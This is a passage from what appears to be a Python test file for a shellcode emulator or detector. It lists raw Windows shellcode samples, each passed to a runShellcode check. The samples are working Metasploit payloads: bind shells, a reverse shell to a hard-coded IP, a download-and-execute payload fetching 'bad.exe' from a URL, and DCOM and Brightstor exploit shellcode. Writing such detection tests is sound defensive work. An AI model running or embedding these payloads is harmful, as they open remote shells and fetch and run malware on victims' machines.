b"\xfd\x79\xea\x1a\x26\x3d\xea\x33\x3e\x92\x1d\x73\x7a\x18\x8e\xfd" 199 | shellcode += b"\x4d\x01\xea\x29\x22\x18\x8a\x3f\x89\x2d\xea\x77\xec\x28\xa1\xef" 200 | shellcode += b"\xae\x9d\xa1\x02\x05\xd8\xab\x7b\x03\xdb\x8a\x82\x39\x4d\x45\x5e" 201 | shellcode += b"\x77\xfc\xea\x29\x26\x18\x8a\x10\x89\x15\x2a\xfd\x5d\x05\x60\x9d" 202 | shellcode += b"\x01\x35\xea\xff\x6e\x3d\x7d\x17\xc1\x28\xba\x12\x89\x5a\x51\xfd" 203 | shellcode += b"\x42\x15\xea\x06\x1e\xb4\xea\x36\x0a\x47\x09\xf8\x4c\x17\x8d\x26" 204 | shellcode += b"\xfd\xcf\x07\x25\x64\x71\x52\x44\x6a\x6e\x12\x44\x5d\x4d\x9e\xa6" 205 | shellcode += b"\x6a\xd2\x8c\x8a\x39\x49\x9e\xa0\x5d\x90\x84\x10\x83\xf4\x69\x74" 206 | shellcode += b"\x57\x73\x63\x89\xd2\x71\xb8\x7f\xf7\xb4\x36\x89\xd4\x4a\x32\x25" 207 | shellcode += b"\x51\x4a\x22\x25\x41\x4a\x9e\xa6\x64\x71\x70\x2a\x64\x4a\xe8\x97" 208 | shellcode += b"\x97\x71\xc5\x6c\x72\xde\x36\x89\xd4\x73\x71\x27\x57\xe6\xb1\x1e" 209 | shellcode += b"\xa6\xb4\x4f\x9f\x55\xe6\xb7\x25\x57\xe6\xb1\x1e\xe7\x50\xe7\x3f" 210 | shellcode += b"\x55\xe6\xb7\x26\x56\x4d\x34\x89\xd2\x8a\x09\x91\x7b\xdf\x18\x21" 211 | shellcode += b"\xfd\xcf\x34\x89\xd2\x7f\x0b\x12\x64\x71\x02\x1b\x8b\xfc\x0b\x26" 212 | shellcode += b"\x5b\x30\xad\xff\xe5\x73\x25\xff\xe0\x28\xa1\x85\xa8\xe7\x23\x5b" 213 | shellcode += b"\xfc\x5b\x4d\xe5\x8f\x63\x59\xdd\xa9\xb2\x09\x04\xfc\xaa\x77\x89" 214 | shellcode += b"\x77\x5d\x9e\xa0\x59\x4e\x33\x27\x53\x48\x0b\x77\x53\x48\x34\x27" 215 | shellcode += b"\xfd\xc9\x09\xdb\xdb\x1c\xaf\x25\xfd\xcf\x0b\x89\xfd\x2e\x9e\xa6" 216 | shellcode += b"\x89\x4e\x9d\xf5\xc6\x7d\x9e\xa0\x50\xe6\xb1\x1e\xf2\x93\x65\x29" 217 | shellcode += b"\x51\xe6\xb7\x89\xd2\x19\x61\x76" 218 | 219 | self.runShellcode(shellcode, 4) 220 | 221 | def testShellcode5(self): 222 | """ 223 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com 224 | """ 225 | 226 | shellcode = b"\x31\xc9\xdd\xc1\xd9\x74\x24\xf4\xbb\xbe\x78\x0e\x3a\xb1\x51\x5e" 227 | shellcode += b"\x83\xc6\x04\x31\x5e\x11\x03\xe0\x69\xec\xcf\xe0\xe0\x1b\x62\xf0" 228 | shellcode += b"\x0c\x24\x82\xff\x8f\x50\x11\xdb\x6b\xec\xaf\x1f\xff\x8e\x2a\x27" 229 | shellcode += b"\xfe\x81\xbe\x98\x18\xd5\x9e\x06\x18\x02\x69\xcd\x2e\x5f\x6b\x3f" 230 | shellcode += b"\x7f\x9f\xf5\x13\x04\xdf\x72\x6c\xc4\x2a\x77\x73\x04\x41\x7c\x48" 231 | shellcode += b"\xdc\xb2\x55\xdb\x39\x31\xfa\x07\xc3\xad\x63\xcc\xcf\x7a\xe7\x8d" 232 | shellcode += b"\xd3\x7d\x1c\x32\xc0\xf6\x6b\x58\x3c\x15\x0d\x63\x0d\xfe\xa9\xe8" 233 | shellcode += b"\x2d\x30\xb9\xae\xbd\xbb\xcd\x32\x13\x30\x6d\x42\x35\x2f\xe0\x1c" 234 | shellcode += b"\xc7\x43\xac\x5f\x01\xfd\x1e\xf9\xc6\x31\x93\x6d\x60\x45\xe1\x32" 235 | shellcode += b"\xda\x56\xd5\xa4\x29\x45\x2a\x0f\xfe\x69\x05\x30\x77\x70\xcc\x4f" 236 | shellcode += b"\x6a\x73\x13\x1a\x1f\x86\xec\x74\xb7\x5f\x1b\x81\xe5\x37\xe3\xbf" 237 | shellcode += b"\xa5\xe4\x48\x6c\x19\x48\x3c\xd1\xce\xb1\x12\xb3\x98\x5c\xcf\x5d" 238 | shellcode += b"\x0a\xd6\x0e\x34\xc4\x4c\xca\x46\xd2\xda\x14\x70\xb6\xf4\xbb\x29" 239 | shellcode += b"\xb8\x25\x53\x75\xeb\xe8\x4d\x22\x0b\x22\xde\x99\x0c\x1b\x89\xc4" 240 | shellcode += b"\xba\x1a\x03\x51\xc2\xf5\xc4\x09\x68\xaf\x1b\x61\x03\x27\x03\xf8" 241 | shellcode += b"\xe2\xc1\x9c\x05\x3c\x64\xdc\x29\xa7\xed\x46\xaf\x40\x91\xeb\xa6" 242 | shellcode += b"\x74\x3f\xa4\xe1\x5f\x0c\xcd\xf6\xca\xc8\x47\x1a\x3b\x11\xa4\x70" 243 | shellcode += b"\xc2\xd3\x66\x7a\x79\xf8\xeb\x0f\x04\x38\xa7\xa4\x52\x50\xc5\x44" 244 | shellcode += b"\x17\xb7\xd6\xcd\x1c\x47\xfe\x76\xca\xe5\xae\xd9\xa5\x63\x50\x88" 245 | shellcode += b"\x14\x21\x03\xd5\x47\xa1\x0e\xf0\x6d\xfc\x02\xfd\xb8\x6a\x5a\xfe" 246 | shellcode += b"\x72\x94\x74\x8b\x2a\x96\xf6\x4f\xb0\x99\x2f\x1d\xc6\xb6\xb8\x51" 247 | shellcode += b"\xb2\x33\x66\xc2\x3c\xed\x67\x34" 248 | 249 | self.runShellcode(shellcode, 5) 250 | 251 | def testShellcode6(self): 252 | """ 253 | win32_bind - EXITFUNC=seh LPORT=4444 Size=349 Encoder=JmpCallAdditive http://metasploit.com 254 | """ 255 | 256 | shellcode = b"\xfc\xbb\x1e\x88\xb8\x04\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" 257 | shellcode += b"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xe2\xe2\x53\x49\xf2\x0a\x5c" 258 | shellcode += b"\xad\xfd\x8d\x28\x3e\x25\x6a\xa4\xfa\x19\xf9\xc6\x01\x19\xfc\xd9" 259 | shellcode += b"\x81\x96\xe6\xae\xc9\x08\x16\x5a\xbc\xc3\x2c\x17\x3e\x3d\x7d\xe7" 260 | shellcode += b"\xd8\x6d\xfa\x27\xae\x6a\xc2\x62\x42\x75\x06\x99\xa9\x4e\xd2\x7a" 261 | shellcode += b"\x7a\xc5\x3f\x09\x25\x01\xc1\xe5\xbc\xc2\xcd\xb2\xcb\x8b\xd1\x45" 262 | shellcode += b"\x27\x30\xc6\xce\x3e\x5a\x32\xcd\x21\x61\x0b\x36\xc5\xee\x2f\xf8" 263 | shellcode += b"\x8d\xb0\xa3\x73\xe1\x2c\x11\x08\x42\x44\x37\x67\xcd\x1a\xc9\x9b" 264 | shellcode += b"\x81\x5d\x03\x05\x71\xc7\xc4\xf9\x47\x6f\x62\x8d\x95\x30\xd8\x8e" 265 | shellcode += b"\x0a\xa6\x2b\x9d\x57\x0d\xfc\xa1\x7e\x2e\x75\xb8\x19\x51\x68\x4b" 266 | shellcode += b"\xe4\x04\x19\x4e\x17\x76\xb5\x97\xee\x83\xeb\x7f\x0e\xbd\xa7\x2c" 267 | shellcode += b"\xa3\x12\x1b\x90\x10\xd7\xc8\xe9\x47\xb1\x86\x04\x34\x5b\x04\xae" 268 | shellcode += b"\x25\x36\xc2\x14\xbf\x48\xd4\x02\x3f\x7e\xb0\xbc\xee\x2b\xba\x6d" 269 | shellcode += b"\x78\x77\xe9\xa0\x90\x20\x0d\x6a\x31\x9b\x0e\x43\xde\xc6\xb8\xe2" 270 | shellcode += b"\x56\x5f\xc4\x3d\x38\x0b\x6e\x97\x46\x63\x1d\x7f\x5e\xfa\xe4\xf9" 271 | shellcode += b"\xf7\x03\x3e\xac\x08\x2b\xd9\x25\x93\xad\x4e\xd9\x36\xb8\x6a\x77" 272 | shellcode += b"\x99\xe3\x5d\x44\x90\xf4\xf4\x10\x2a\x18\x39\x59\xdf\x76\xc4\x1b" 273 | shellcode += b"\x0d\x78\x7b\xb0\xde\x09\x06\xf0\x4b\xba\x5c\x68\xfe\x42\x11\x7f" 274 | shellcode += b"\x01\xcf\x12\x7f\x2b\x74\xcc\x2d\x85\xdb\xa3\xbb\x24\x8a\x12\x69" 275 | shellcode += b"\x76\xd3\x45\xf9\xd5\xf2\x63\x34\x76\xfb\xba\xa2\x86\xfc\x74\xcc" 276 | shellcode += b"\xa9\x89\x2c\xce\xc9\x49\xb6\xd1\x18\x03\xc8\xfe\xcd\x53\xbc\xfb" 277 | shellcode += b"\x52\xc0\x3e\xd5\x92\x36\xc0\xda\x6c\xb6\xc1\xda\x6c" 278 | 279 | self.runShellcode(shellcode, 6) 280 | 281 | def testShellcode7(self): 282 | """ 283 | win32_reverse - EXITFUNC=seh LHOST=216.75.15.231 LPORT=4321 Size=287 Encoder=None http://metasploit.com 284 | """ 285 | 286 | shellcode = b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" 287 | shellcode += b"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" 288 | shellcode += b"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" 289 | shellcode += b"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" 290 | shellcode += b"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" 291 | shellcode += b"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" 292 | shellcode += b"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" 293 | shellcode += b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" 294 | shellcode += b"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" 295 | shellcode += b"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" 296 | shellcode += b"\xd8\x4b\x0f\xe7\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9" 297 | shellcode += b"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" 298 | shellcode += b"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" 299 | shellcode += b"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" 300 | shellcode += b"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" 301 | shellcode += b"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" 302 | shellcode += b"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" 303 | shellcode += b"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" 304 | 305 | self.runShellcode(shellcode, 7) 306 | 307 | def testShellcode8(self): 308 | """ 309 | win32_downloadexec - URL=http://nepenthes.mwcollect.org/bad.exe Size=378 Encoder=None http://metasploit.ndings.pyx.swpcom 310 | """ 311 | 312 | shellcode = b"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2\xfa" 313 | shellcode += b"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd\x38\xa9" 314 | shellcode += b"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12" 315 | shellcode += b"\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d" 316 | shellcode += b"\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f" 317 | shellcode += b"\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12" 318 | shellcode += b"\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85" 319 | shellcode += b"\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a" 320 | shellcode += b"\x5f\x97\x12\x49\xf3\x9d\xc0\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb" 321 | shellcode += b"\xcf\x66\xce\x65\xc3\x12\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a" 322 | shellcode += b"\x5f\x8a\xcf\xdf\x19\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9" 323 | shellcode += b"\x12\x45\xf3\xb9\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e" 324 | shellcode += b"\xdd\x9a\x9d\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce" 325 | shellcode += b"\x65\x12\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c" 326 | shellcode += b"\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59" 327 | shellcode += b"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd" 328 | shellcode += b"\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4\xdd\xf0" 329 | shellcode += b"\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc\xe1\xfc\xfa" 330 | shellcode += b"\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd" 331 | shellcode += b"\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb\xf5\xf4\xf6\xf7\x99" 332 | shellcode += b"\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8\xfd\xcd\xf6\xdf\xf0\xf5" 333 | shellcode += b"\xfc\xd8\x99\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x70\x65\x6e\x74" 334 | shellcode += b"\x68\x65\x73\x2e\x6d\x77\x63\x6f\x6c\x6c\x65\x63\x74\x2e\x6f\x72" 335 | shellcode += b"\x67\x2f\x62\x61\x64\x2e\x65\x78\x65\x80" 336 | 337 | self.runShellcode(shellcode, 8) 338 | 339 | def testShellcode9(self): 340 | """ 341 | win32_exec - EXITFUNC=seh CMD=cmd -c ftp.exe -s foo.scripted_sequence; echo der 342 | fox hat die gans gezogen Size=205 Encoder=None http://metasploit.com 343 | """ 344 | 345 | shellcode = b"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" 346 | shellcode += b"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" 347 | shellcode += b"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" 348 | shellcode += b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" 349 | shellcode += b"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" 350 | shellcode += b"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" 351 | shellcode += b"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" 352 | shellcode += b"\x83\xc0\x7b\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff" 353 | shellcode += b"\xe7\x63\x6d\x64\x20\x2d\x63\x20\x66\x74\x70\x2e\x65\x78\x65\x20" 354 | shellcode += b"\x2d\x73\x20\x66\x6f\x6f\x2e\x73\x63\x72\x69\x70\x74\x65\x64\x5f" 355 | shellcode += b"\x73\x65\x71\x75\x65\x6e\x63\x65\x3b\x20\x65\x63\x68\x6f\x20\x64" 356 | shellcode += b"\x65\x72\x20\x66\x6f\x78\x20\x68\x61\x74\x20\x64\x69\x65\x20\x67" 357 | shellcode += b"\x61\x6e\x73\x20\x67\x65\x7a\x6f\x67\x65\x6e\x20\x00" 358 | 359 | self.runShellcode(shellcode, 9) 360 | 361 | def testShellcode10(self): 362 | """ 363 | Some old DCOM code 364 | """ 365 | 366 | shellcode = b"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" # 0x0090 ..^1.... ....6..2" 367 | shellcode += b"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" # 0x00a0 ........ ........" 368 | shellcode += b"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a" # 0x00b0 .S..tWu. ......Z." 369 | shellcode += b"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d" # 0x00c0 ...|..2. ..:k...M" 370 | shellcode += b"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc" # 0x00d0 .q....2. ..Z...2." 371 | shellcode += b"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90" # 0x00e0 ......A. .....6t." 372 | shellcode += b"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b" # 0x00f0 ..Z.~.$| ..2..."k" 373 | shellcode += b"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2" # 0x0100 ..LLb... ..2....." 374 | shellcode += b"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2" # 0x0110 ...y|... ..2....." 375 | shellcode += b"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2" # 0x0120 ....u..j ..2....." 376 | shellcode += b"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2" # 0x0130 .....x.z ..2....." 377 | shellcode += b"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2" # 0x0140 ...9.V.J ..2....." 378 | shellcode += b"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2" # 0x0150 .......Z ..2....." 379 | shellcode += b"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b" # 0x0160 ....F..* ..2....k" 380 | shellcode += b"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4" # 0x0170 .S....f. ..2...*." 381 | shellcode += b"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96" # 0x0180 ..b...bk ...L..Z." 382 | shellcode += b"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2" # 0x0190 ..n.L.$. .@d....." 383 | shellcode += b"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7" # 0x01a0 ..c..... P.W...Z." 384 | shellcode += b"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d" # 0x01b0 .......x .2.....]" 385 | shellcode += b"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d" # 0x01c0 .~'?bB.. ..vj...." 386 | shellcode += b"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0" # 0x01d0 ..z...~. ..b..."." 387 | shellcode += b"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f" # 0x01e0 ..c...c. ......"." 388 | shellcode += b"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2" # 0x01f0 L..k.@d. .wek...." 389 | shellcode += b"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98" # 0x0200 ..d.!.2. .:...4r." 390 | shellcode += b"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94" # 0x0210 ...9..:. .4r....." 391 | shellcode += b"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0" # 0x0220 ...Q.... ..g..4^." 392 | shellcode += b"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4" # 0x0230 .4w...7. .j...4h." 393 | shellcode += b"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38" # 0x0240 .b...4.. .J.k|..8" 394 | shellcode += b"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1" # 0x0250 .{F.Ap?. xT....&." 395 | shellcode += b"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f" # 0x0260 a4h..bT. ........" 396 | shellcode += b"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90" # 0x0270 .41Qk..T .jm....." 397 | shellcode += b"\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00\x24\x00\x5c\x00\x31\x00\x32" # 0x0280 ./...\.C .$.\.1.2" 398 | shellcode += b"\x00\x33\x00\x34\x00\x35\x00\x36\x00\x31\x00\x31\x00\x31\x00\x31" # 0x0290 .3.4.5.6 .1.1.1.1" 399 | shellcode += b"\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31" # 0x02a0 .1.1.1.1 .1.1.1.1" 400 | shellcode += b"\x00\x31\x00\x31\x00\x31\x00\x2e\x00\x64\x00\x6f\x00\x63\x00\x00" # 0x02b0 .1.1.1.. .d.o.c.." 401 | shellcode += b"\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x20\x00\x00\x00\x30\x00\x2d" # 0x02c0 ........ . ...0.-" 402 | shellcode += b"\x00\x00\x00\x00\x00\x88\x2a\x0c\x00\x02\x00\x00\x00\x01\x00\x00" # 0x02d0 ......*. ........" 403 | shellcode += b"\x00\x28\x8c\x0c\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00" # 0x02e0 .(...... ........" 404 | shellcode += b"\x00" 405 | 406 | self.runShellcode(shellcode, 10) 407 | 408 | def testShellcode11(self): 409 | """ 410 | Brightstor discovery 411 | """ 412 | 413 | shellcode = b"\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x06\x41\x41\x14\x57\x80\x23" # 0x0030 AAAAAAAA ..AA.W.#" 414 | shellcode += b"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x25\x01\x80\x34\x0b\x99\xe2\xfa" # 0x0040 ..[K3.f. %..4...." 415 | shellcode += b"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x62\x99\x99\x99\xc6\xfd\x38\xa9" # 0x0050 .......p b.....8." 416 | shellcode += b"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xf1\x91\x12\x6e\xf3" # 0x0060 ........ .4....n." 417 | shellcode += b"\x9d\xc0\x71\x02\x99\x99\x99\x7b\x60\xf1\xaa\xab\x99\x99\xf1\xee" # 0x0070 ..q....{ `......." 418 | shellcode += b"\xea\xab\xc6\xcd\x66\x8f\x12\x71\xf3\x9d\xc0\x71\x1b\x99\x99\x99" # 0x0080 ....f..q ...q...." 419 | shellcode += b"\x7b\x60\x18\x75\x09\x98\x99\x99\xcd\xf1\x98\x98\x99\x99\x66\xcf" # 0x0090 {`.u.... ......f." 420 | shellcode += b"\x89\xc9\xc9\xc9\xc9\xd9\xc9\xd9\xc9\x66\xcf\x8d\x12\x41\xf1\x59" # 0x00a0 ........ .f...A.Y" 421 | shellcode += b"\xec\xe3\xa0\xf1\x9b\x99\x66\x63\x12\x55\xf3\x89\xc8\xca\x66\xcf" # 0x00b0 ......fc .U....f." 422 | shellcode += b"\x81\x1c\x59\xec\xd3\xf1\xfa\xf4\xfd\x99\x10\xff\xa9\x1a\x75\xcd" # 0x00c0 ..Y..... ......u." 423 | shellcode += b"\x14\xa5\xbd\xf3\x8c\xc0\x32\x7b\x64\x5f\xdd\xbd\x89\xdd\x67\xdd" # 0x00d0 ......2{ d_....g." 424 | shellcode += b"\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14\xdd" # 0x00e0 ........ ........" 425 | shellcode += b"\xbd\x89\xcd\xc9\xc8\xc8\xc8\xf3\x98\xc8\xc8\x66\xef\xa9\xc8\x66" # 0x00f0 ........ ...f...f" 426 | shellcode += b"\xcf\x9d\x12\x55\xf3\x66\x66\xa8\x66\xcf\x91\xca\x66\xcf\x85\x66" # 0x0100 ...U.ff. f...f..f" 427 | shellcode += b"\xcf\x95\xc8\xcf\x12\xdc\xa5\x12\xcd\xb1\xe1\x9a\x4c\xcb\x12\xeb" # 0x0110 ........ ....L..." 428 | shellcode += b"\xb9\x9a\x6c\xaa\x50\xd0\xd8\x34\x9a\x5c\xaa\x42\x96\x27\x89\xa3" # 0x0120 ..l.P..4 .\.B.'.." 429 | shellcode += b"\x4f\xed\x91\x58\x52\x94\x9a\x43\xd9\x72\x68\xa2\x86\xec\x7e\xc3" # 0x0130 O..XR..C .rh...~." 430 | shellcode += b"\x12\xc3\xbd\x9a\x44\xff\x12\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d" # 0x0140 ....D... .....D.." 431 | shellcode += b"\x12\x9a\x5c\x32\xc7\xc0\x5a\x71\x99\x66\x66\x66\x17\xd7\x97\x75" # 0x0150 ..\2..Zq .fff...u" 432 | shellcode += b"\xeb\x67\x2a\x8f\x34\x40\x9c\x57\x76\x57\x79\xf9\x52\x74\x65\xa2" # 0x0160 .g*.4@.W vWy.Rte." 433 | shellcode += b"\x40\x90\x6c\x34\x75\x60\x33\xf9\x7e\xe0\x5f\xe0\x41\x41\x41\x41" # 0x0170 @.l4u`3. ~._.AAAA" 434 | 435 | self.runShellcode(shellcode, 11) 436 | 437 | def testShellcode12(self): 438 | """ 439 | Amberg 440 | """ 441 | 442 | shellcode = b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\xeb\x02\xeb\x6b" 443 | shellcode += b"\xe8\xf9\xff\xff\xff\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" 444 | shellcode += b"\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x32" 445 | shellcode += b"\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac\x3a\xc4\x74\x07" 446 | shellcode += b"\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" 447 | shellcode += b"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5" 448 | shellcode += b"\xeb\x02\x33\xc0\x5f\x5e\x5d\x5b\x89\x44\x24\x04\x8b\x04\x24\x89" 449 | shellcode += b"\x44\x24\x08\x8b\x44\x24\x04\x83\xc4\x08\xc3\x5e\x6a\x30\x59\x64" 450 | shellcode += b"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x7b\x08\x83\xec\x1c" 451 | shellcode += b"\x8b\xec\x33\xc0\x50\x68\x2e\x65\x78\x65\x89\x65\x14\x57\x68\xea" 452 | shellcode += b"\x49\x8a\xe8\xff\xd6\x6a\x06\xff\x75\x14\xff\xd0\x89\x45\x04\x57" 453 | shellcode += b"\x68\xdb\x8a\x23\xe9\xff\xd6\x89\x45\x0c\x57\x68\x8e\x4e\x0e\xec" 454 | shellcode += b"\xff\xd6\x33\xc9\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x77" 455 | shellcode += b"\x73\x32\x5f\x54\xff\xd0\x8b\xd8\x53\x68\xb6\x19\x18\xe7\xff\xd6" 456 | shellcode += b"\x89\x45\x10\x53\x68\xe7\x79\xc6\x79\xff\xd6\x89\x45\x18\x53\x68" 457 | shellcode += 